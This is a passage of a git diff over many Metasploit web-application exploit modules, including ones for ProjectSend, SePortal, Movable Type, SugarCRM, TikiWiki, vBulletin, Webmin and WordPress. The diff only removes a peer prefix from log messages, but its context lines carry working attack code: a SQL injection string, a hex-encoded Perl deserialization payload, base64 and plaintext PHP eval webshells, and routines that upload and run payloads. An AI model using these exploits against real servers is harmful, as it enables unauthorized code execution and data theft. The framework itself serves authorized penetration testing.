'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.code == 500 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 402c9a0d33..71382a1f17 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) if res and res.code == 404 - print_error("#{peer} - The upload most likely failed") + print_error("The upload most likely failed") return end @@ -123,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote p = get_write_exec_payload(:unlink_self=>true) - print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") + print_status("Uploading PHP payload (#{p.length.to_s} bytes)...") res = upload_php(base, php_fname, p, folder_name) if not res - print_error("#{peer} - No response from server") + print_error("No response from server") return end - print_status("#{peer} - Executing '#{php_fname}'...") + print_status("Executing '#{php_fname}'...") exec_php(base, res) end end diff --git a/modules/exploits/unix/webapp/projectsend_upload_exec.rb b/modules/exploits/unix/webapp/projectsend_upload_exec.rb index d61721a33b..e01415cfb4 100644 --- a/modules/exploits/unix/webapp/projectsend_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectsend_upload_exec.rb @@ -59,19 +59,19 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, 'process-upload.php') ) if !res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 - vprint_error("#{peer} - No process-upload.php found") + vprint_error("No process-upload.php found") return Exploit::CheckCode::Safe elsif res.code.to_i == 500 - vprint_error("#{peer} - Unable to write file") + vprint_error("Unable to write file") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ - vprint_error("#{peer} - File process-upload.php is not executable") + vprint_error("File process-upload.php is not executable") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ - vprint_error("#{peer} - Software is misconfigured") + vprint_error("Software is misconfigured") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ # response on revision 118 onwards includes the file name @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ return Exploit::CheckCode::Appears elsif res.body && res.body =~ /Failed to open output stream/ - vprint_error("#{peer} - Upload folder is not writable") + vprint_error("Upload folder is not writable") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote data = Rex::MIME::Message.new data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) post_data = data.to_s - print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") + print_status("Uploading file '#{fname}' (#{php.length} bytes)") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), @@ -121,14 +121,14 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") # response on revision 118 onwards includes the file name elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ - print_good("#{peer} - Payload uploaded successfully (#{fname})") + print_good("Payload uploaded successfully (#{fname})") return fname # response on revisions 100 to 117 does not include the file name elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ - print_warning("#{peer} - File upload may have failed") + print_warning("File upload may have failed") return fname else - vprint_status("#{peer} - Received response: #{res.code} - #{res.body}") + vprint_status("Received response: #{res.code} - #{res.body}") fail_with(Failure::Unknown, "#{peer} - Something went wrong") end end @@ -137,18 +137,18 @@ class Metasploit3 < Msf::Exploit::Remote # Execute uploaded file # def exec(upload_path) - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_raw( { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 ) if !res - print_status("#{peer} - Request timed out while executing") + print_status("Request timed out while executing") elsif res.code.to_i == 404 - vprint_error("#{peer} - Not found: #{upload_path}") + vprint_error("Not found: #{upload_path}") elsif res.code.to_i == 200 - vprint_good("#{peer} - Executed #{upload_path}") + vprint_good("Executed #{upload_path}") else - print_error("#{peer} - Unexpected reply") + print_error("Unexpected reply") end end diff --git a/modules/exploits/unix/webapp/seportal_sqli_exec.rb b/modules/exploits/unix/webapp/seportal_sqli_exec.rb index d5385a3fd3..8f8da55d8e 100644 --- a/modules/exploits/unix/webapp/seportal_sqli_exec.rb +++ b/modules/exploits/unix/webapp/seportal_sqli_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version.to_f <= 2.5 return Exploit::CheckCode::Appears @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + print_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "login.php"), @@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 and res.get_cookies =~ /sessionid=([a-zA-Z0-9]+)/ session = $1 - print_status("#{peer} - Login successful") - print_status("#{peer} - Session cookie is [ #{session} ]") + print_status("Login successful") + print_status("Session cookie is [ #{session} ]") else fail_with(Failure::Unknown, "#{peer} - Login was not succesful!") end @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote sqli << "FROM seportal_sessions WHERE session_user_id=1 LIMIT 1" sqli << "),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '0x#{sqls}'='0x#{sqls}" - print_status("#{peer} - Retrieving admin session through SQLi") + print_status("Retrieving admin session through SQLi") res = send_request_cgi({ 'method' => 'POST', 'vars_get' => { "sp_id" => sqli }, @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/ adminhash = $1 - print_status("#{peer} - Admin session is [ #{adminhash} ]") + print_status("Admin session is [ #{adminhash} ]") else fail_with(Failure::Unknown, "#{peer} - Retrieving admin session failed!") end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin", "downloads.php"), @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup(payload_name) - print_status("#{peer} - Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") + print_status("Requesting payload [ #{uri}/data/down_media/#{payload_name} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "data", "down_media", "#{payload_name}") @@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb index 5503487ccc..4d18db356b 100644 --- a/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb +++ b/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb @@ -69,12 +69,12 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/ - vprint_error("#{peer} - File uploads are disabled") + vprint_error("File uploads are disabled") return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"") post_data = data.to_s - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'upload.php'), @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/) - print_good("#{peer} - Payload uploaded successfully.") + print_good("Payload uploaded successfully.") register_files_for_cleanup(@fname) if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/ @upload_path = normalize_uri(target_uri.path, "#{$1}") - print_good("#{peer} - Found upload path #{@upload_path}") + print_good("Found upload path #{@upload_path}") else @upload_path = normalize_uri(target_uri.path, 'in') - print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'") + print_warning("Could not find upload path - assuming '#{@upload_path}'") end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote # Executes our uploaded malicious file # def exec - print_status("#{peer} - Executing #{@fname}...") + print_status("Executing #{@fname}...") res = send_request_raw({ 'uri' => normalize_uri(@upload_path, @fname), 'cookie' => 'access=3' diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 3bdd447427..9a75e1d9cb 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -91,7 +91,7 @@ print "LFI test for storable flaw is: $frozen\n"; =end def check - vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure") + vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), @@ -103,7 +103,7 @@ print "LFI test for storable flaw is: $frozen\n"; }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") - vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test"); + vprint_status("Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable @@ -158,14 +158,14 @@ print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive - print_status("#{peer} - Using nondestructive attack method") + print_status("Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', @@ -201,10 +201,10 @@ print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive - print_status("#{peer} - Using destructive attack method") + print_status("Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection - print_status("#{peer} - Sending storable injection to unlink mt-config.cgi") + print_status("Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', @@ -224,7 +224,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Now we rewrite mt-config.cgi to accept a payload - print_status("#{peer} - Rewriting mt-config.cgi to accept the payload") + print_status("Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', @@ -247,7 +247,7 @@ print "RCE unlink payload requiring CGI: $frozen\n"; # Finally send the payload - print_status("#{peer} - Sending payload request") + print_status("Sending payload request") send_request_cgi({ 'method' => 'GET', diff --git a/modules/exploits/unix/webapp/skybluecanvas_exec.rb b/modules/exploits/unix/webapp/skybluecanvas_exec.rb index a67c67bbb0..5575ae12fc 100644 --- a/modules/exploits/unix/webapp/skybluecanvas_exec.rb +++ b/modules/exploits/unix/webapp/skybluecanvas_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw('uri' => uri) if res and res.body =~ /[1.1 r248]/ - vprint_good("#{peer} - SkyBlueCanvas CMS 1.1 r248-xx found") + vprint_good("SkyBlueCanvas CMS 1.1 r248-xx found") return Exploit::CheckCode::Appears end @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = normalize_uri(target_uri.path.to_s, "index.php") - vprint_status("#{peer} - Sending request to #{uri}.") + vprint_status("Sending request to #{uri}.") send_request_cgi({ 'method' => 'POST', diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 6c08aaa9af..918ff7cfb7 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{f}") + print_warning("Deleting #{f}") client.fs.file.rm(f) - print_good("#{peer} - #{f} removed to stay ninja") + print_good("#{f} removed to stay ninja") rescue - print_warning("#{peer} - Unable to remove #{f}") + print_warning("Unable to remove #{f}") end end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") data = "module=Contacts&" data << "Contacts2_CONTACT_offset=1&" @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" - print_status("#{peer} - Exploiting the unserialize()") + print_status("Exploiting the unserialize()") res = send_request_cgi( { @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Exploit failed: #{res.code}") end - print_status("#{peer} - Executing the payload") + print_status("Executing the payload") res = send_request_cgi( { diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index b54648b7f0..3f6e06931e 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" - print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem") + print_status("Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( 'uri' => normalize_uri(base, "tiki-rss_error.php") @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote return else tiki_path = $1 - print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}" + print_good "Tiki Wiki path disclosure: #{tiki_path}" end php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") + print_error("Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_cgi( { @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index 037463b905..ac13d101db 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def do_login() - print_status("#{peer} - Logging in...") + print_status("Logging in...") username = datastore['USERNAME'] password = datastore['PASSWORD'] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}") end - print_status("#{peer} - Login successful with #{username}:#{password}") + print_status("Login successful with #{username}:#{password}") res.get_cookies end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the PHP object injection...") + print_status("Exploiting the PHP object injection...") exec_php(payload.encoded) end end diff --git a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb index da87cb4613..373ad569cc 100644 --- a/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb +++ b/modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote max = datastore["MAXNODE"] if min > max - print_error("#{peer} - MINNODE can't be major than MAXNODE") + print_error("MINNODE can't be major than MAXNODE") return nil end @@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote def get_node if datastore['NODE'].nil? or datastore['NODE'] <= 0 - print_status("#{peer} - Brute forcing to find a valid node id...") + print_status("Brute forcing to find a valid node id...") return brute_force_node end - print_status("#{peer} - Checking node id #{datastore['NODE']}...") + print_status("Checking node id #{datastore['NODE']}...") if exists_node?(datastore['NODE']) return datastore['NODE'] else @@ -356,18 +356,18 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(session) - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end @@ -425,22 +425,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking for a valid node id...") + print_status("Checking for a valid node id...") node_id = get_node if node_id.nil? - print_error("#{peer} - node id not found") + print_error("node id not found") return end - print_good("#{peer} - Using node id #{node_id} to exploit sqli... Counting users...") + print_good("Using node id #{node_id} to exploit sqli... Counting users...") data = do_sqli(node_id, "select count(*) from user") if data.empty? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end count_users = data.to_i users = [] - print_good("#{peer} - #{count_users} users found") + print_good("#{count_users} users found") for i in 0..count_users - 1 user = get_user_data(node_id, i) @@ -466,10 +466,10 @@ class Metasploit3 < Msf::Exploit::Remote @session = nil users.each do |user| - print_status("#{peer} - Trying to log into vBulletin admin control panel as #{user[0]}...") + print_status("Trying to log into vBulletin admin control panel as #{user[0]}...") @session = do_login(user[0], user[1]) unless @session.blank? - print_good("#{peer} - Logged in successfully as #{user[0]}") + print_good("Logged in successfully as #{user[0]}") break end end @@ -478,7 +478,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel") end - print_status("#{peer} - Getting the install product security token...") + print_status("Getting the install product security token...") install_token = get_install_token if install_token.nil? fail_with(Failure::Unknown, "#{peer} - Failed to get the install token") @@ -486,9 +486,9 @@ class Metasploit3 < Msf::Exploit::Remote @session_hash = install_token[:session_hash] @product_id = rand_text_alpha_lower(5 + rand(8)) - print_status("#{peer} - Installing the malicious product #{@product_id}...") + print_status("Installing the malicious product #{@product_id}...") if install_product(install_token) - print_good("#{peer} - Product successfully installed... payload should be executed...") + print_good("Product successfully installed... payload should be executed...") else # Two situations trigger this path: # 1) Upload failed but there wasn't answer from the server. I don't think it's going to happen often. @@ -497,18 +497,18 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("#{peer} - Getting the uninstall token info...") + print_status("Getting the uninstall token info...") delete_token = get_delete_token if delete_token.nil? - print_error("#{peer} - Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") + print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...") return end - print_status("#{peer} - Deleting the product #{@product_id}...") + print_status("Deleting the product #{@product_id}...") if delete_product(delete_token) - print_good("#{peer} - Product #{@product_id} deleted") + print_good("Product #{@product_id} deleted") else - print_error("#{peer} - Failed uninstall the product #{@product_id}, should be done manually...") + print_error("Failed uninstall the product #{@product_id}, should be done manually...") end end diff --git a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb index 652d68b0fe..45c8bbe1cf 100644 --- a/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb +++ b/modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb @@ -154,10 +154,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 if res.body =~ /Invalid Username\/Password/ - vprint_error("#{peer} - Invalid Username or Password.") + vprint_error("Invalid Username or Password.") return Exploit::CheckCode::Detected elsif res.body =~ /Invalid session_name/ - vprint_error("#{peer} - Web client session not found") + vprint_error("Web client session not found") return Exploit::CheckCode::Detected elsif res.body =~ /\.\n\.\.\n/m return Exploit::CheckCode::Vulnerable @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Checking if injection is possible...") + print_status("Checking if injection is possible...") res = request('ls -a .') unless res and res.code == 200 @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote if res.body =~ /Invalid session_name/ fail_with(Failure::NoAccess, "#{peer} - Valid web client session not found, provide astGUI or wait until someone logins") unless astguiclient_creds? - print_error("#{peer} - Valid web client session not found, trying to create one...") + print_error("Valid web client session not found, trying to create one...") res = login unless res and res.code == 200 and res.body =~ /you are logged/ fail_with(Failure::NoAccess, "#{peer} - Invalid astGUIcient credentials, check astGUI credentials or wait until someone login.") @@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, "#{peer} - Injection hasn't been possible") end - print_good("#{peer} - Exploitation looks feasible, proceeding... ") + print_good("Exploitation looks feasible, proceeding... ") request("#{payload.encoded}", 1) end diff --git a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb index 29c80dd4bf..1579b33cc9 100644 --- a/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb +++ b/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Attempting to login...") + vprint_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) if res and res.code == 302 and res.get_cookies =~ /sid/ - vprint_good "#{peer} - Authentication successful" + vprint_good "Authentication successful" session = res.get_cookies.split("sid=")[1].split(";")[0] else - vprint_error "#{peer} - Service found, but authentication failed" + vprint_error "Service found, but authentication failed" return Exploit::CheckCode::Detected end - vprint_status("#{peer} - Attempting to execute...") + vprint_status("Attempting to execute...") command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" @@ -121,18 +121,18 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_good "#{peer} - Authentication successfully" + print_good "Authentication successfully" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to execute the payload...") + print_status("Attempting to execute the payload...") command = payload.encoded @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.message =~ /Document follows/ - print_good "#{peer} - Payload executed successfully" + print_good "Payload executed successfully" else - print_error "#{peer} - Error executing the payload" + print_error "Error executing the payload" return end diff --git a/modules/exploits/unix/webapp/webtester_exec.rb b/modules/exploits/unix/webapp/webtester_exec.rb index 7d6f169d17..5817ebf9d4 100644 --- a/modules/exploits/unix/webapp/webtester_exec.rb +++ b/modules/exploits/unix/webapp/webtester_exec.rb @@ -59,16 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) }) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /Eppler Software/ if res.body =~ / - v5\.1\.20101016/ - vprint_status("#{peer} - Found version: 5.1.20101016") + vprint_status("Found version: 5.1.20101016") return Exploit::CheckCode::Appears elsif res.body =~ / - v(5\.[\d\.]+)/ - vprint_status("#{peer} - Found version: #{$1}") + vprint_status("Found version: #{$1}") return Exploit::CheckCode::Appears else return Exploit::CheckCode::Detected @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cppassword', 'cpdomain' ] - print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...") + print_status("Sending payload (#{payload.encoded.length} bytes)...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install2.php'), @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 and res.body =~ /Failed to connect to database server/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::Unknown, "#{peer} - Something went wrong") end diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb index 7c9f49e32a..1ab30f176f 100644 --- a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb @@ -68,22 +68,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? - print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") + print_status("Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded - print_status("#{peer} - Executing the payload at 